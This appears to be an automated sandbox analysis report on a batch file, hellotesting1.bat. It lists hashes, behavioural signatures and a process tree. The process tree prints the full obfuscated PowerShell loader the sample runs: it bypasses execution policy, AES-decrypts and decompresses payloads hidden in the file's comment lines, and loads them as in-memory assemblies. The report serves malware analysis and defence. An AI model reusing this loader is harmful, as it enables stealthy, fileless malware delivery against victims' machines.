Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
30-05-2024 10:17
Static task
static1
Behavioral task
behavioral1
Sample
hellotesting1.bat
Resource
win7-20240221-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
hellotesting1.bat
Resource
win10v2004-20240426-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
hellotesting1.bat
-
Size
710KB
-
MD5
1c6a9ae804188b09a9d22a6ce2a4e16a
-
SHA1
fd6cb4acd356a4b21fdd3d8bad229153fefe6803
-
SHA256
2868c25ebff7a0b0ac9989e6df5a1d6f8625713980b1bf74af596d2204ed0d8c
-
SHA512
2fd8a3f0398d8b81d03529d74c532239e9da40a8565ab1e48d3278eca2b880def39d96d8e364f6bfa98b4326ac7ac9636fd0666c4ac051e74d47a40b17d9c576
-
SSDEEP
12288:0CA9ic1CGZWdhoXOExoF4LD4q+shjUIMgE4GScdQzNpxMtGh7CYS7lXInOZ1CTYz:0zTbkcxoi34qj5SgbGVG/xoK7CR3CTC
Score
3/10
Malware Config
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 3040 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 3040 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3040 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1736 wrote to memory of 3040 1736 cmd.exe powershell.exe PID 1736 wrote to memory of 3040 1736 cmd.exe powershell.exe PID 1736 wrote to memory of 3040 1736 cmd.exe powershell.exe PID 1736 wrote to memory of 3040 1736 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\hellotesting1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IbqOzYTeDhh6EbAnT+hBFd1cVHa3aIZ61TH3e8TlXMw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TRyGVjGg7e04rN6VcrTNsA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rutUS=New-Object System.IO.MemoryStream(,$param_var); $RKQvm=New-Object System.IO.MemoryStream; $DRWff=New-Object System.IO.Compression.GZipStream($rutUS, [IO.Compression.CompressionMode]::Decompress); $DRWff.CopyTo($RKQvm); $DRWff.Dispose(); $rutUS.Dispose(); $RKQvm.Dispose(); $RKQvm.ToArray();}function execute_function($param_var,$param2_var){ $tCKKt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QCbWu=$tCKKt.EntryPoint; $QCbWu.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\hellotesting1.bat';$YYuKO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\hellotesting1.bat').Split([Environment]::NewLine);foreach ($LeEqs in $YYuKO) { if ($LeEqs.StartsWith(':: ')) { $XNFZh=$LeEqs.Substring(3); break; }}$payloads_var=[string[]]$XNFZh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040